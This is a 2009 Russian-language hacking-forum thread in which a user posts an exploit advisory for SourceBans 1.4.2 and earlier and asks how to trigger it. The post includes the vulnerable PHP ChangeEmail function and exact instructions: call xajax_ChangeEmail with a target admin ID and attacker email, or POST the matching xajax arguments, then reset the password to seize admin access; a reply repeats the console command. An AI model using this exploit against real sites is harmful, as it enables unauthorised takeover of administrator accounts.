Непонятный Эксплоит.

Discussion in 'Болталка' started by shOotzy, 13 Jul 2009.

  1. shOotzy

    shOotzy New Member

    Joined:
    11 Jul 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться в этом эксплоите :

    Code:
    Sourcebans (PHP) (sb-callback.php) Author: Mr. Anonymous ------ Vendor:http://www.sourcebans.com Affected Versions: <= 1.4.2 ----- Exploit (sb-callback lines 185-204): ------------- function ChangeEmail($aid, $email) { ...SNIP... $GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` = '".$email."' WHERE `aid` = '".$aid."'"); $objResponse->addScript("ShowBox('E-mail address changed', 'Your E-mail address has been changed successfully.', 'green', 'index.php?p=account', true);"); $log = new CSystemLog("m", "E-mail Changed", "E-mail changed for admin (".$aid.")"); return $objResponse; } ------- How to Exploit ------- No checking is done to verify you own that email address. You can simply submit a post request with the following arguments, to change any admins email with your own (or a temporary one), and then reset their password, then get full admin access. You can download firebug for firefox, and simply run in the console "xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need to send these variables to index.php via POST: xxajax: ChangeEmail xajaxargs[]: ADMIN_ID xajaxargs[]: EMAIL_TO_CHANGE_TO
    Первый раз с толкнулся с таким эксплоитом...
    Как его вызвать ?
     
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://forum.antichat.ru/showpost.php?p=1363169&postcount=142
     
  3. Flegmatique

    Flegmatique Banned

    Joined:
    6 Jul 2009
    Messages:
    7
    Likes Received:
    9
    Reputations:
    0
    You can download firebug for firefox, and simply run in the console "xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)"